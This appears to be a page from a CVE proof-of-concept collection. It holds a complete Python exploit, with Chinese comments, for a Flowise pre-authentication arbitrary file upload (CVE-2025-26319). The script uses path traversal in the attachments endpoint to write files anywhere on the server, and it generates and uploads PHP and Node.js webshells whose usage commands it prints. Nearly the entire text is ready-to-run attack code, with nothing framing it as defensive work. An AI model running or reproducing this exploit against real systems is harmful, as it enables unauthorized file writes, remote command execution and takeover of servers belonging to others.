4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-26319_exp.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Flowise Pre-Auth Arbitrary File Upload (CVE-2025-26319) Exploit
# Reference: https://medium.com/@attias.dor/the-burn-notice-part-2-5-5-flowise-pre-auth-arbitrary-file-upload-cve-2025-26319-0d4194a34183

import requests
import argparse
import os
import sys
import mimetypes
from urllib.parse import urljoin

def banner():
    print("""
    ╔════════════════════════════════════════════════════════════════╗
    ║                                                                ║
    ║   Flowise Pre-Auth Arbitrary File Upload (CVE-2025-26319)      ║
    ║                                                                ║
    ╚════════════════════════════════════════════════════════════════╝
    """)

def check_target(url):
    """检查目标是否可能是Flowise实例"""
    try:
        # 尝试访问API版本端点,这个端点在白名单中
        version_url = urljoin(url, "/api/v1/version")
        resp = requests.get(version_url, timeout=10)
        if resp.status_code == 200:
            print(f"[+] 目标似乎是Flowise实例,版本信息: {resp.text}")
            return True
        else:
            print(f"[!] 目标响应代码: {resp.status_code},可能不是Flowise实例")
            return False
    except Exception as e:
        print(f"[!] 检查目标时出错: {str(e)}")
        return False

def upload_file(url, local_file, target_path):
    """
    利用CVE-2025-26319上传文件到任意路径
    
    参数:
    - url: 目标Flowise实例URL
    - local_file: 要上传的本地文件路径
    - target_path: 目标服务器上的路径(包括文件名)
    """
    if not os.path.exists(local_file):
        print(f"[!] 本地文件不存在: {local_file}")
        return False
    
    # 分解目标路径为目录和文件名
    target_dir = os.path.dirname(target_path)
    target_filename = os.path.basename(target_path)
    
    if not target_filename:
        print("[!] 目标路径必须包含文件名")
        return False
    
    # 构造路径遍历攻击
    # 使用一个固定的chatflowId,并在chatId中进行路径遍历
    chatflow_id = "exploit"
    
    # 构造路径遍历,从存储目录回溯到目标目录
    chat_id = f"..{'/..' * 10}/{target_dir.lstrip('/')}"  # 使用足够多的..回溯
    
    endpoint = f"/api/v1/attachments/{chatflow_id}/{chat_id}"
    upload_url = urljoin(url, endpoint)
    
    print(f"[*] 上传文件到: {upload_url}")
    print(f"[*] 目标文件: {target_path}")
    
    # 准备文件上传
    try:
        file_content = open(local_file, "rb").read()
        file_mimetype = mimetypes.guess_type(local_file)[0] or "application/octet-stream"
        
        # 构造multipart/form-data请求
        files = {
            "files": (target_filename, file_content, file_mimetype)
        }
        
        # 发送请求
        response = requests.post(upload_url, files=files, timeout=30)
        
        # 检查响应
        if response.status_code in [200, 201]:
            print(f"[+] 文件上传成功! 状态码: {response.status_code}")
            print(f"[+] 响应内容: {response.text}")
            return True
        else:
            print(f"[!] 文件上传失败. 状态码: {response.status_code}")
            print(f"[!] 响应内容: {response.text}")
            return False
    except Exception as e:
        print(f"[!] 上传过程中出错: {str(e)}")
        return False

def check_upload_success(url, target_path):
    """尝试验证文件是否成功上传"""
    try:
        # 这里我们只能基于特定情况进行验证
        # 例如,如果上传的是JSON文件到API配置目录
        if target_path.endswith('api.json'):
            api_url = urljoin(url, "/api/v1/apikey")
            resp = requests.get(api_url)
            if resp.status_code == 200:
                print("[+] 成功验证API配置文件被修改!")
                return True
        
        print("[*] 无法直接验证文件上传结果,请手动确认")
        return None
    except Exception as e:
        print(f"[!] 验证过程中出错: {str(e)}")
        return False

def generate_webshell(filename, language):
    """生成不同语言的简单webshell"""
    webshells = {
        "php": """<?php system($_REQUEST['cmd']); ?>""",
        "nodejs": """
const http = require('http');
const { exec } = require('child_process');

http.createServer((req, res) => {
    const cmd = new URL(req.url, `http://${req.headers.host}`).searchParams.get('cmd');
    if (cmd) {
        exec(cmd, (error, stdout, stderr) => {
            res.writeHead(200, { 'Content-Type': 'text/plain' });
            res.end(stdout || stderr || error);
        });
    } else {
        res.writeHead(200, { 'Content-Type': 'text/plain' });
        res.end('Ready for commands');
    }
}).listen(3333);
"""
    }
    
    if language not in webshells:
        print(f"[!] 不支持的语言: {language}")
        return None
    
    with open(filename, 'w') as f:
        f.write(webshells[language])
    
    print(f"[+] 生成{language}类型webshell: {filename}")
    return filename

def main():
    banner()
    
    parser = argparse.ArgumentParser(description="Flowise Pre-Auth Arbitrary File Upload (CVE-2025-26319) Exploit")
    parser.add_argument("-u", "--url", required=True, help="目标Flowise实例URL (例如: http://example.com:3000)")
    parser.add_argument("-f", "--file", help="要上传的本地文件路径")
    parser.add_argument("-d", "--destination", help="目标服务器上的文件路径 (例如: /root/.flowise/api.json)")
    parser.add_argument("--generate-webshell", choices=["php", "nodejs"], help="自动生成指定类型的webshell")
    parser.add_argument("--webshell-path", help="webshell在服务器上的路径 (使用--generate-webshell时必需)")
    
    args = parser.parse_args()
    
    # 检查目标是否为Flowise实例
    if not check_target(args.url):
        print("[!] 目标可能不是Flowise实例,是否继续? (y/n)")
        choice = input().lower()
        if choice != 'y':
            sys.exit(1)
    
    # 处理webshell生成
    if args.generate_webshell:
        if not args.webshell_path:
            print("[!] 使用--generate-webshell时必须指定--webshell-path")
            sys.exit(1)
        
        temp_webshell = f"temp_webshell.{args.generate_webshell}"
        generate_webshell(temp_webshell, args.generate_webshell)
        
        # 上传生成的webshell
        success = upload_file(args.url, temp_webshell, args.webshell_path)
        
        # 清理临时文件
        os.remove(temp_webshell)
        
        if success:
            if args.generate_webshell == "php":
                print(f"[+] PHP Webshell上传成功,可通过以下URL访问: {urljoin(args.url, args.webshell_path)}")
                print(f"[+] 使用方式: curl '{urljoin(args.url, args.webshell_path)}?cmd=id'")
            elif args.generate_webshell == "nodejs":
                print(f"[+] Node.js后门脚本上传成功,服务器将尝试在端口3333启动HTTP服务")
                print(f"[+] 使用方式: curl 'http://目标IP:3333/?cmd=id'")
    
    # 处理常规文件上传
    elif args.file and args.destination:
        success = upload_file(args.url, args.file, args.destination)
        if success:
            check_upload_success(args.url, args.destination)
    else:
        if not (args.generate_webshell and args.webshell_path):
            print("[!] 必须提供--file和--destination参数,或使用--generate-webshell和--webshell-path")
            parser.print_help()
            sys.exit(1)

if __name__ == "__main__":
    main()